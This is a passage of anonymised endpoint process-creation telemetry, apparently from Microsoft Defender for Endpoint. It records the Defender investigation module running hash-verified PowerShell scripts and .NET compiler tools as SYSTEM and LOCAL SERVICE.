+573,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:47.504515400+00:00,12960,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_b9fa14dd491fd5e84540690b0ec2ae6030174cbb.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_6b212f1dd5f5b912b514153aafb06412f53afd7c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:47.275712300+00:00,8668,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\h4esek2b.cmdline""",True,2021-06-24 01:25:42.261583+00:00,3276,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:47.508423300+00:00,2021-06-24 01:27:35.565080900+00:00,b7d3a566-401b-499d-9ab3-be4f0a933753,computerpii_0a470890c60768167990033d701e7bd881398861,171497,False,10.7740.19041.1052,False,11540474045175651,,11540474045175652,2021-06-24 01:25:47.275712300+00:00,8668,2021-06-24 01:25:47.275712300+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,8668,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 01:25:47.280393600+00:00,2019-12-07 09:10:35.992536100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+574,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:48.404516400+00:00,6588,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\gzskg1hg\gzskg1hg.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:42.259799800+00:00,4004,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '55ac3e59e2c2dd5964cb1760cab52db52c7ff7bbb2cb5e65ddf2ab4ad48043d3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_b0e4a6fa7a08a13dc38c85a6be2c0794960d2d83.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:48.415158500+00:00,2021-06-24 01:27:35.573660400+00:00,efe7b4c4-b3af-4391-8143-27ba5e5ba23a,computerpii_0a470890c60768167990033d701e7bd881398861,171589,False,10.7740.19041.1052,False,11540474045175639,,11540474045175653,2021-06-24 01:25:42.259799800+00:00,4004,2021-06-24 01:25:42.259799800+00:00,powershell.exe,4004,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+575,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:48.475504200+00:00,16116,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_8192b3e71574336abac45a888abc006fc99ef1eb.tmp"" ""c:\Windows\Temp\gzskg1hg\FilePII_f2ec5af8bab8fa6ac925c519c01456e508554ad1.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:48.404516400+00:00,6588,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\gzskg1hg\gzskg1hg.cmdline""",True,2021-06-24 01:25:42.259799800+00:00,4004,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:48.504630800+00:00,2021-06-24 01:27:35.574138500+00:00,4c119857-0083-441c-ac28-1273d790620d,computerpii_0a470890c60768167990033d701e7bd881398861,171594,False,10.7740.19041.1052,False,11540474045175653,,11540474045175654,2021-06-24 01:25:48.404516400+00:00,6588,2021-06-24 01:25:48.404516400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,6588,18560,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 01:25:48.407997200+00:00,2019-12-07 09:10:35.992536100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+576,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.276063300+00:00,15752,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f7ed3f0185f9909f46bfe31eb7d83a13525be0156decf68c4371aa0d343a562e')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.302970800+00:00,2021-06-24 01:27:35.583151400+00:00,1e8308fc-a96d-49a0-b0a0-1fc3e2a53dde,computerpii_0a470890c60768167990033d701e7bd881398861,171688,False,10.7740.19041.1052,False,11540474045175619,,11540474045175656,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+577,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.303256700+00:00,2021-06-24 01:27:35.583230800+00:00,03bea1f1-819e-4a7f-bc38-312d1378da8d,computerpii_0a470890c60768167990033d701e7bd881398861,171689,False,10.7740.19041.1052,False,11540474045175619,,11540474045175657,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+578,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.280238700+00:00,5396,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a38d6942a28fff0188a34846e2109047922bc919012efd7e48948cd6491ea24f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:22.168891200+00:00,11584,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4208"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.303496+00:00,2021-06-24 01:27:35.583315600+00:00,7e719e4a-9061-4ad9-b002-7e63cdd1e86a,computerpii_0a470890c60768167990033d701e7bd881398861,171690,False,10.7740.19041.1052,False,11540474045175619,,11540474045175658,2021-06-24 01:25:22.168891200+00:00,11584,2021-06-24 01:25:22.168891200+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11584,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+579,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.288371900+00:00,15648,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.280238700+00:00,5396,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'a38d6942a28fff0188a34846e2109047922bc919012efd7e48948cd6491ea24f')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.304510500+00:00,2021-06-24 01:27:35.583395400+00:00,71696e52-0ec5-4ea5-8e0e-7ae4baf04162,computerpii_0a470890c60768167990033d701e7bd881398861,171691,False,10.7740.19041.1052,False,11540474045175658,,11540474045175660,2021-06-24 01:25:52.280238700+00:00,5396,2021-06-24 01:25:52.280238700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,5396,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+580,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.289236900+00:00,12012,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 01:25:52.276063300+00:00,15752,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'f7ed3f0185f9909f46bfe31eb7d83a13525be0156decf68c4371aa0d343a562e')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_9fc1b3b68c1e16ee6782bcaa19899c513dc6c13b.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.305158900+00:00,2021-06-24 01:27:35.583487600+00:00,a43e637a-bc9f-4654-a690-c0d7a94d72f6,computerpii_0a470890c60768167990033d701e7bd881398861,171692,False,10.7740.19041.1052,False,11540474045175656,,11540474045175662,2021-06-24 01:25:52.276063300+00:00,15752,2021-06-24 01:25:52.276063300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,15752,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+581,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:25:52.288612400+00:00,3700,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.279823300+00:00,4400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'dd957e11064540b8cf34c19a86f451e4964cd2b223912701bc08567d61375d6c')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_211f2500aafe8c3a435e856ea4a2d552922ccf4f.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:25:52.305401400+00:00,2021-06-24 01:27:35.583582700+00:00,d5feb90e-7d99-4848-b269-9e22d7cfc5c9,computerpii_0a470890c60768167990033d701e7bd881398861,171693,False,10.7740.19041.1052,False,11540474045175657,,11540474045175661,2021-06-24 01:25:52.279823300+00:00,4400,2021-06-24 01:25:52.279823300+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,4400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
